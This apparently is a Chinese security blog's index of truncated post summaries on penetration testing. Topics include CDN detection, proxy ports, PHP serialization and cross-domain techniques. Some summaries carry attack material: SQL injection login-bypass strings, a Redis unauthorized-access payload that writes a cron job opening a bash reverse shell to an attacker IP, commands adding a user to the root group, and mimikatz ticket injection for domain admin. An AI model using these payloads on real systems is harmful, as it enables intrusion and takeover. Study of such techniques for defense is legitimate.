摘要:
很久以前注册的账号密码,什么也不知道,整理一下 嗯,重新开始 阅读全文
摘要:
0x01 验证是否存在CDN 方法1 很简单,使用各种多地 ping 的服务,查看对应 IP 地址是否唯一,如果不唯一多半是使用了CDN, 多地 Ping 网站有: http://ping.chinaz.com/ http://ping.aizhan.com/ http://ce.cloud.360 阅读全文
摘要:
asp aspx万能密码1:"or "a"="a2:'.).or.('.a.'='.a 3:or 1=1--4:'or 1=1--5:a'or' 1=1--6:"or 1=1--7:'or.'a.'='a8:"or"="a'='a9:'or''='10:'or'='or'admin'or 1=1#P 阅读全文
摘要:
常用端口号:代理服务器常用以下端口:(1). HTTP协议代理服务器常用端口号:80/8080/3128/8081/9080(2). SOCKS代理协议服务器常用端口号:1080(3). FTP(文件传输)协议代理服务器常用端口号:21(4). Telnet(远程登录)协议代理服务器常用端口:23 阅读全文
摘要:
阅读全文
摘要:
序列化__sleep的时候必要返回一个数组,一定返回对象的属性,否则报错,键值的key不重要,bbbbbbbbb根本不重要,主要是值是不是对象的属性的名字对上,也就是aa就不正确,a正确 这里可以看见如果sleep里面返回的有对应属性的名字a那么后续的操作也就是$de->a='123';,最后序列化 阅读全文
摘要:
web服务器只是提供静态网页解析(如apache),或者提供跳转的这么一种服务。而web中间件或者叫做应用服务器(其包含web容器)可以解析动态语言,比如tomcat可以解析jsp(因为tomcat含有jsp容器),当然它也可以解析静态资源,因此它既是web中间件也是web服务器。不过tomcat解 阅读全文
摘要:
./redis-cli -h 192.168.11.125 -p 58023 set x "\n\n\n*/1 * * * * bash-i &> /dev/tcp/192.168xx/xxx ) 0>&1 \n\n\n" config set dir /var/spool/cron config 阅读全文
摘要:
useradd ceshi #添加用户 usermod -g root ceshi #添加用户到用户组 非交互式更改密码 echo doiido:123456 | chpasswd echo '123456'| passwd --stdin doiido 更改权限 第一个ALL是指网络中的主机 第二 阅读全文
摘要:
当遇到域环境,获取到一个域成员账号后,如果域控制器未打好补丁,则可以利用本文所提到的漏洞,快速获取到域控制器权限。 mimikatz也是可以看见sid的 3. 票据注入 使用mimikatz将票据注入到当前内存中,伪造凭证,如果成功则拥有域管理权限,可任意访问域中所有机器 阅读全文
摘要:
常用的几种跨域处理方法: 1、JSONP 2、CORS策略 3、document.domain+iframe的设置 4、HTML5的postMessage 5、使用window.name来进行跨域 JSONP是通过src属性来跨域,动态添加一个<script>标签来实现。 CORS "跨域资源共享" 阅读全文